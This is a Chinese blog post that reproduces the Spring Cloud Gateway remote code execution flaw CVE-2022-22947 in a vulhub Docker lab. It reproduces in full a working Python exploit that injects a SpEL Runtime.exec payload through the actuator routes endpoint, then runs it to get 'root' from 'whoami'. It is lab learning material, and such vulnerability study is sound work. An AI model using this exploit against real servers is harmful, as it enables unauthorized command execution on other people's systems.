cve-2022-22947漏洞复现(Spring Cloud Gateway 远程代码执行漏洞)

最新推荐文章于 2025-08-08 09:05:38 发布
原创 最新推荐文章于 2025-08-08 09:05:38 发布 · 583 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #java #web安全

文章描述了一种在Docker容器环境下利用SpringCloudGatewayCVE-2022-22947漏洞进行远程代码执行的方法,包括了漏洞利用脚本的详细步骤和Pythonexploit的使用实例。

此次环境部署在docker环境中,亲测有效

更新vulhub

git pull

切换到/spring/cve-2022-22947目录

cd /spring/cve-2022-22947

┌──(root💀kali)-[/home/kali/vulhub]
└─# cd spring

┌──(root💀kali)-[/home/kali/vulhub/spring]
└─# ls
	CVE-2016-4977  CVE-2017-4971  CVE-2017-8046  CVE-2018-1270  CVE-2018-1273  CVE-2022-22947
┌──(root💀kali)-[/home/kali/vulhub/spring]
└─# cd CVE-2022-22947
┌──(root💀kali)-[/home/kali/vulhub/spring/CVE-2022-22947]
└─# docker-compose up -d      //拉取漏洞环境
	cve-2022-22947_spring_1 is up-to-date

┌──(root💀kali)-[/home/kali/vulhub/spring/CVE-2022-22947]
└─# docker-compose up -d    //查看靶场环境开启
	Starting cve-2022-22947_spring_1 ... done

在这里插入图片描述使用python写payload进行测试(大神的!!!

# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://spring.io/
# Software Link: https://spring.io/projects/spring-cloud-gateway
# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1
# Tested on: 3.1.0
# CVE : CVE-2022-22947

import random
import string
import requests
import json
import sys
import urllib.parse
import base64

headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}

id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))

def exploit(url, command):
    
    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
    
    commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')      #将输入的命令进行base64编码

    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False)
    if(rbase.status_code == 201):
        print("[+] Stage deployed to /actuator/gateway/routes/"+id)
        print("[+] Executing command...")
        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False)
        if(r.status_code == 200):
            print("[+] getting result...")
            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
            if(r.status_code == 200):
                get_response = r.json()
                clean(url, id)
                return get_response['filters'][0].split("'")[1]
            else:
                print("[-] Error: Invalid response")
                clean(url, id)
                exit(1)
        else:
            clean(url, id)
            print("[-] Error executing command")

    
def clean(url, id):
    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
    if(remove.status_code == 200):
        print("[+] Stage removed!")
    else:
        print("[-] Error: Fail to remove stage")

def banner():
    print("""
    ###################################################
    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
    ###################################################
    """)

def main():
    banner()
    if len(sys.argv) != 3:
        print("[-] Error: Invalid arguments")
        print("[-] Usage: python3 exploit.py <url> <command>")
        exit(1)
    else:
        url = sys.argv[1]
        command = sys.argv[2]
        print(exploit(url, command))
if __name__ == '__main__':
    main()

执行该脚本,并进行命令执行。

┌──(root💀kali)-[/home/kali/vulhub/spring/CVE-2022-22947]
└─# python3 CVE-2022-22947.py http://192.168.2.129:8080 'whoami'                       //’whoami‘代码执行

在这里插入图片描述
root //代码执行后获取结果

完毕!!!

CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3508
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 2013
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
热门推荐
一只爱吃橙子的羊
03-12 2万+
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
WordPress 未授权本地文件包含漏洞复现CVE-2025-2294)
最新发布
m0_47398713的博客
08-08 195
Fofa:body=“wp-content/plugins/kubio/” 漏洞验证完成; 想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
m0_58596609的博客
10-11 2190
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
漏洞复现笔记(CVE-2022-22947
weixin_72760965的博客
06-14 396
2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行影响版本旧的、不受支持的版本也会受到影响漏洞原理Spring Cloud GatewaySpring中的一个API网关。
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
web_15534274656的博客
09-11 884
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-06 3339
Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。建议使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。近日,披露Spring Cloud Gateway存在一处远程代码执行漏洞CVE-2022-22947)。
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947
日常技术分享
10-16 8460
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947
CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-10 2077
最开始时,我们开发java项目时,所有的代码都在一个工程里,我们把它称为单体架构。当我们的项目的代码量越来越大时,开发的成员越来越多时,这时我们项目的性能以及我们开发的效率都会存在非常大的问题,所以对于这样的项目,我们需要把它拆分为不同的服务,举个列子,原来很大的一个工程,我们把它拆分为一个个服务,比如说订单服务、用户服务、商品服务、物流服务、资金服务等等,因为有了这些服务之后,我们又引入了服务网关、服务注册发现、配置中心、调用链监控、Metrices监控等等的这些组件对这些服务进行协调和管理。
Spring Cloud GatewayCVE-2022-22947漏洞复现
weixin_45095113的博客
07-28 2694
Spring Cloud GatewayCVE-2022-22947漏洞复现
Spring Cloud 网关执行器 API SPEL 代码注入 (CVE-2022-22947)历史漏洞复现
chao321654987的博客
03-01 923
*”如有疑问或发现疏漏,欢迎评论区评论,共同完善知识体系“*2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。高危1.除了Spring Cloud Gateway 外,程序还用到了 Spring Boot Actuator 组件(它用于对外提供 /actuator/ 接口);2.Spring 配置对外暴露 gateway 接口,
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 8811
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现
CVE-2022-22947(Spring-Cloud-Gateway)
Christ1na的博客
04-09 1114
`SpringCloud Gateway` 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
CVE-2022-22947Spring Cloud Gateway中的SPEL远程代码执行分析
"分析CVE-2022-22947Spring Cloud Gateway中的SPEL远程代码执行漏洞" CVE-2022-22947 是一个针对Spring Cloud Gateway安全漏洞,该漏洞可能导致Spring Cloud Gateway的用户面临远程代码执行(RCE)的风险。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值